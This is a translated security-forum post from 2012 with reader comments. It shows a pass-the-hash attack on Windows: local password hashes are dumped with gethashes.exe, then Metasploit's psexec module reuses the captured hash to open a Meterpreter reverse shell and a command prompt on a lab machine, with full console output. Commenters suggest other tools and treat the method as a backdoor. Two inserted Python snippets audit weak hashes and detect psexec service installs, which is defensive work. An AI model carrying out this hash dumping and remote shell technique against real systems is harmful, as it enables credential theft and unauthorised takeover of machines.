
Logging into Windows Directly with a Hash

VIP | 2012-09-10 16:13

First, on the local host (taken here as the target host), create a new user isosky and give it a password, then retrieve the hashes with gethashes.exe:


C:\>net user isosky test
The command completed successfully.

C:\>gethashes.exe $local
1:1007:C2265B23734E0DACAAD3B435B51404EE:69943C5E63B4D2C104DBBCC15138B72B:::
Administrator:500:0A174C1272FCBCF7804E0502081BA8AE:83F36A86631180CB9F5F53F5F45DFB2B:::
Guest:501:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0:::
HelpAssistant:1000:CF88594C2AC20629EEF3D6DABD2DA92D:0FCE98570CBB9C14E8FF200353B2707B:::
isosky:1003:01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537:::
SUPPORT_388945a0:1002:AAD3B435B51404EEAAD3B435B51404EE:F9E8AE6C7229EA07EFAC12715F954B83:::
__vmware_user__:1006:AAD3B435B51404EEAAD3B435B51404EE:915D1CEE456EA4DD6A8094F7CE094448:::

C:\>
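The dump above is in pwdump format (user:RID:LM hash:NT hash:::), the same LM:NT pair that is later pasted into SMBPass. As an added defender-side example that is not part of the original post, this Python auditor reads such a dump and flags accounts that still have an LM hash stored (LM storage not disabled on the host), accounts whose LM second half is the empty block (password of 7 characters or fewer), and accounts with a blank password. The empty-password LM/NT constants are public values; the sample input is the page's own dump with its wrapped lines rejoined.

```python
import re

# Public constants, not specific to this page: the LM hash of an empty password,
# its 8-byte half, and the NT hash of an empty password.
EMPTY_LM = "AAD3B435B51404EEAAD3B435B51404EE"
EMPTY_LM_HALF = EMPTY_LM[16:]
EMPTY_NT = "31D6CFE0D16AE931B73C59D7E0C089C0"

# pwdump-style line: user:rid:lmhash:nthash:::  (the trailing ':::' is optional)
PWDUMP_RE = re.compile(r"^([^:]+):(\d+):([0-9A-Fa-f]{32}):([0-9A-Fa-f]{32})(?::::)?$")


def parse_pwdump_line(line):
    """Return (user, rid, LM, NT) with upper-cased hashes, or None if the line does not match."""
    m = PWDUMP_RE.match(line.strip())
    if not m:
        return None
    user, rid, lm, nt = m.groups()
    return user, int(rid), lm.upper(), nt.upper()


def audit_pwdump(lines):
    """Map each account in a dump to the weaknesses visible from its stored hashes."""
    report = {}
    for line in lines:
        parsed = parse_pwdump_line(line)
        if parsed is None:  # blank lines, headers, wrapped fragments
            continue
        user, _rid, lm, nt = parsed
        issues = []
        if nt == EMPTY_NT:
            issues.append("blank password")
        if lm != EMPTY_LM:
            # A real LM hash means LM storage is still enabled on this host.
            issues.append("LM hash stored")
            if lm[16:] == EMPTY_LM_HALF:
                # LM hashes each 7-char half separately; an empty second half means <= 7 chars.
                issues.append("password is 7 characters or shorter")
        report[user] = issues
    return report


# Sample input: the gethashes.exe dump shown above, with the wrapped lines rejoined.
PAGE_DUMP = """
1:1007:C2265B23734E0DACAAD3B435B51404EE:69943C5E63B4D2C104DBBCC15138B72B:::
Administrator:500:0A174C1272FCBCF7804E0502081BA8AE:83F36A86631180CB9F5F53F5F45DFB2B:::
Guest:501:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0:::
HelpAssistant:1000:CF88594C2AC20629EEF3D6DABD2DA92D:0FCE98570CBB9C14E8FF200353B2707B:::
isosky:1003:01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537:::
SUPPORT_388945a0:1002:AAD3B435B51404EEAAD3B435B51404EE:F9E8AE6C7229EA07EFAC12715F954B83:::
__vmware_user__:1006:AAD3B435B51404EEAAD3B435B51404EE:915D1CEE456EA4DD6A8094F7CE094448:::
""".splitlines()
```

Note that isosky was created above with the 4-character password "test", and its LM second half is exactly the empty block the auditor looks for.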

Then I go back to my BT virtual machine (the attacker host) and test with MSF; the PSEXEC module that ships with MSF supports pass-the-hash authentication.

root@bt:~# msfconsole

                ##                          ###           ##    ##
##  ##  #### ###### ####  #####   #####    ##    ####        ######
####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##
####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##
## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##
##   ##  #### ###   #####   #####     ##   ####   ####   #### ###
                                      ##


       =[ metasploit v3.7.0-release [core:3.7 api:1.0]
+ -- --=[ 684 exploits - 355 auxiliary
+ -- --=[ 217 payloads - 27 encoders - 8 nops
       =[ svn r12536 updated 76 days ago (2011.05.04)

Warning: This copy of the Metasploit Framework was last updated 76 days ago.
         We recommend that you update the framework at least every other day.
         For information on updating your copy of Metasploit, please see:
             http://www.metasploit.com/redmine/projects/framework/wiki/Updating

msf > use exploit/windows/smb/psexec
msf exploit(psexec) > show options

Module options (exploit/windows/smb/psexec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOST                       yes       The target address
   RPORT      445              yes       Set the SMB service port
   SHARE      ADMIN$           yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBDomain  WORKGROUP        no        The Windows domain to use for authentication
   SMBPass                     no        The password for the specified username
   SMBUser                     no        The username to authenticate as


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(psexec) > set RHOST 192.168.0.254
RHOST => 192.168.0.254
msf exploit(psexec) > set SMBUser isosky
SMBUser => isosky
msf exploit(psexec) > set SMBPass 01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537
SMBPass => 01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537
msf exploit(psexec) > show options

Module options (exploit/windows/smb/psexec):

   Name       Current Setting                                                    Required  Description
   ----       ---------------                                                    --------  -----------
   RHOST      192.168.0.254                                                      yes       The target address
   RPORT      445                                                                yes       Set the SMB service port
   SHARE      ADMIN$                                                             yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBDomain  WORKGROUP                                                          no        The Windows domain to use for authentication
   SMBPass    01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537  no        The password for the specified username
   SMBUser    isosky                                                             no        The username to authenticate as


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(psexec) > exploit

[*] Started reverse handler on 192.168.0.3:4444
[*] Connecting to the server...
[*] Authenticating to 192.168.0.254:445|WORKGROUP as user 'isosky'...
[*] Uploading payload...
[*] Created \UGdecsam.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.0.254[\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.0.254[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (MZsCnzjn - "MrZdoQwIlbBIYZQJyumxYX")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting \UGdecsam.exe...
[*] Sending stage (749056 bytes) to 192.168.0.254
[*] Meterpreter session 1 opened (192.168.0.3:4444 -> 192.168.0.254:1877) at 2011-07-19 03:57:17 +0800

meterpreter > sysinfo
Computer        : ISOSKY-PC
OS              : Windows XP (Build 2600, Service Pack 2).
Architecture    : x86
System Language : zh_CN
Meterpreter     : x86/win32
meterpreter > shell
Process 4596 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>net user
net user

User accounts for \\

-------------------------------------------------------------------------------
__vmware_user__          1                        Administrator
Guest                    HelpAssistant            isosky
SUPPORT_388945a0
The command completed with one or more errors.


C:\WINDOWS\system32>

At this point we have successfully obtained a CMD shell on the target.
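The psexec output above shows what lands on the target: an 8-letter binary such as \UGdecsam.exe written to the root of the ADMIN$ share (%SystemRoot%) and registered as a service with an 8-letter mixed-case name such as MZsCnzjn, then started and removed. As an added defender-side example, not part of the original post, here is a Python check over System-log 7045 (service installed) records for exactly that pattern. The event dicts and their field names are constructed for this example; the service and file names come from the output above and from the run in comment 14 below.

```python
import re

# Pattern visible in the psexec output above: an 8-letter service name such as
# MZsCnzjn and an 8-letter binary such as \UGdecsam.exe written to the root of
# the ADMIN$ share, i.e. %SystemRoot%.
RANDOM_NAME_RE = re.compile(r"^[A-Za-z]{8}$")
SYSTEMROOT_EXE_RE = re.compile(r"^[A-Za-z]:\\windows\\[A-Za-z]{8}\.exe$", re.IGNORECASE)


def looks_random(name):
    """8 letters, both cases present, and at least two upper/lower switches."""
    if not RANDOM_NAME_RE.match(name):
        return False
    switches = sum(a.isupper() != b.isupper() for a, b in zip(name, name[1:]))
    return switches >= 2


def is_suspicious_install(event):
    """True for a 7045 (service installed) record that matches the psexec drop pattern."""
    if event.get("EventID") != 7045:
        return False
    return looks_random(event.get("ServiceName", "")) and bool(
        SYSTEMROOT_EXE_RE.match(event.get("ServiceFileName", "")))


def find_psexec_installs(events):
    """Return the names of services whose install record looks like a psexec drop."""
    return [e["ServiceName"] for e in events if is_suspicious_install(e)]


# Constructed sample records: field names chosen for this example, values taken
# from the page's two psexec runs plus two benign installs and one non-install event.
SAMPLE_EVENTS = [
    {"EventID": 7045, "ServiceName": "MZsCnzjn", "ServiceFileName": r"C:\WINDOWS\UGdecsam.exe",
     "StartType": "demand start", "Account": "LocalSystem"},
    {"EventID": 7045, "ServiceName": "KynvIEUS", "ServiceFileName": r"C:\WINDOWS\hNYJSGTP.exe",
     "StartType": "demand start", "Account": "LocalSystem"},
    {"EventID": 7045, "ServiceName": "Spooler", "ServiceFileName": r"C:\WINDOWS\system32\spoolsv.exe",
     "StartType": "auto start", "Account": "LocalSystem"},
    {"EventID": 7045, "ServiceName": "VMTools",
     "ServiceFileName": r"C:\Program Files\VMware\VMware Tools\vmtoolsd.exe",
     "StartType": "auto start", "Account": "LocalSystem"},
    {"EventID": 7036, "ServiceName": "MZsCnzjn", "ServiceFileName": ""},  # state change, not an install
]
```

A service that is installed, started and deleted within seconds is the other half of this pattern, so pairing 7045 with the matching removal event tightens the rule further.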

  1# xsser | 2012-09-10 16:30

    good!

  2# 小胖子 | 2012-09-10 16:38

    Awesome!!!!

  3# xsjswt | 2012-09-10 16:45

    nb

  4# popok | 2012-09-10 17:04

    When you can't crack the admin password, this can be used as a backdoor, provided of course that the admin doesn't change the password.

  5# popok | 2012-09-10 17:05

    Of course, dumping the hashes in the first place requires that you already have sufficient shell privileges.

  6# phantom | 2012-09-10 18:14

    Oh and, the smb_login scanner can take a HASH too, you know what I mean.

  7# beastk | 2012-09-10 18:21

    good job!

  8# VIP | 2012-09-10 18:26

  9# phantom | 2012-09-10 19:32

    @xsjswt @popok @beastk @VIP @beastk @xsser @phantom phantom0318 used to be pretty awesome back in the day, submitted tons of modules, gave up C for Ruby because of it, dreaming that one day Rapid would hire him. Ah, what a miserable life.

  10# upload | 2012-09-10 19:51

  11# possible | 2012-09-10 19:53

    Respect, respect. Could someone share gethashes.exe? Thanks.

  12# VIP | 2012-09-10 20:01

  13# z7y | 2012-09-10 21:07

    @VIP I've seen this on Baidu but never figured out how to actually do it ~~ a hands-on tutorial, please!

  14# upload | 2012-09-10 21:39

    msf  exploit(psexec) > exploit

    [*] Started reverse handler on 192.168.126.145:4444
    [*] Connecting to the server...
    [*] Authenticating to 192.168.1.101:445|WORKGROUP as user 'admin'...
    [*] Uploading payload...
    [*] Created \hNYJSGTP.exe...
    [*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.101[\svcctl] ...
    [*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.101[\svcctl] ...
    [*] Obtaining a service manager handle...
    [*] Creating a new service (KynvIEUS - "MQblTXXcKydwALAIeRwWAbcQCvFrOrB")...
    [*] Closing service handle...
    [*] Opening service...
    [*] Starting the service...
    [*] Removing the service...
    [*] Closing service handle...
    [*] Deleting \hNYJSGTP.exe...
    [*] Exploit completed, but no session was created.

    Tragic...

  15# Metasploit (www.metasploit.cn) | 2012-09-11 10:26

    Not bad, fairly detailed.

  16# hongygxiang | 2012-09-11 11:52

    Awesome.

  17# B1n4ry | 2012-09-11 14:13

    This is a very juicy chicken rib!

    BTW, on Windows you can use WCE to inject a remote hash and get remote authentication; after that you can also run commands through PSEXEC, or go through the IPC$ channel and run a bat with at.

  18# lossite | 2012-09-12 07:31

    @phantom +1

  19# piaoye | 2012-09-12 08:07

    Is this the so-called reverse attack?

  20# possible | 2012-09-12 17:11

    @VIP Thanks. This needs the target to have sharing enabled, right?

  21# ttvip11 | 2012-09-17 21:23

    Doesn't wce have a hash injection feature.......

  22# c4bbage | 2012-09-17 23:00

    @phantom Got the account password on Windows 7, but can't get past UAC to set up an interactive shell; psexec, /smb/psexec and Keimpx all failed. Looking for verification, discussion and hands-on experience.

  23# J4nker | 2012-09-30 07:36

    This is pretty nice...

  24# 冷冷的夜 | 2012-10-08 00:50

    wce -s

  25# yingzi | 2012-10-10 22:25

    Generally, any hash you can grab can be cracked.

  26# GaRY | 2012-10-11 12:32

    This is a nice tip, very practical.

  27# 八云幽紫 | 2012-12-14 23:45

    NICE! Very practical!

  28# 店小弎 | 2012-12-15 12:19

    The prerequisite is that port 445 is open. If you know the password, and 135 is open, you can just open a telnet.

  29# saber | 2012-12-15 12:30

    It seems WCE can use the hash too.

  30# 菜菜来报道 | 2013-02-26 09:26

    Learning, learning.

  31# xfkxfk | 2013-02-28 17:10

    Why doesn't mine work? Tragic, no idea why...
    Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_ACCESS_DENIED

  32# icErainow | 2013-10-29 20:08

    http://www.rapid7.com/db/modules/exploit/windows/smb/psexecs
    A vulnerability from the last century, it should be useless by now.

  33# tmp | 2013-10-29 22:42

    @VIP @GaRY @xsser @all Actually I just want to say that metasploit is too heavy; it's not suited to quick hit-and-run work. If all you want is a shell from a hash, the impacket package from the Core company has psexec.py, which does it simply, in one command. If you're interested, go take a look at the impacket package; it's all implemented in python.

  34# Metasploit (www.metasploit.cn) | 2013-10-29 23:01

    @tmp Core isn't something an ordinary company can afford, it's four or five hundred thousand.

  35# tmp | 2013-10-29 23:54

    @Metasploit You're wrong... the core I mean isn't the core impacket exp integrated platform you're thinking of, it's the open-source impacket package from the Core company... go search for it yourself.

  36# tmp | 2013-10-29 23:55

    @Metasploit Just google impacket psexec.py.

  37# s4msung | 2013-10-30 09:01

    Something from a few years back.

    msvctl v0.3 by Johannes Gumbel ([email protected])
    msvctl help (default)
    msvctl list
    msvctl del <luid>
    msvctl [<domain>\<user>] [lm <lm hash>] [ntlm <ntlm hash>] set <luid>
    msvctl <domain>\<user> [lm <lm hash>] [ntlm <ntlm hash>] add <luid>
    msvctl <domain>\<user> [lm <lm hash>] [ntlm <ntlm hash>] run <cmd> ...
    user@domain is equal to domain\user
    xxx:yyy is equal to lm xxx ntlm yyy
    xxx: is equal to lm xxx
    :yyy is equal to ntlm yyy
    a:b:c:d::: is equal to "a@ lm c ntlm d" (pwdump style)
    note: the last three ':' are optional
    note: if username is of form user(xxx) the (xxx) is stripped
    if no domain is provided it defaults to WORKGROUP

  38# Forever80s | 2013-11-02 22:01

    Not bad, msf is really powerful.

  39# blacksun | 2014-05-31 19:16

    I wish the experts would add more comments for us newbies, it's really hard to follow... please respond.
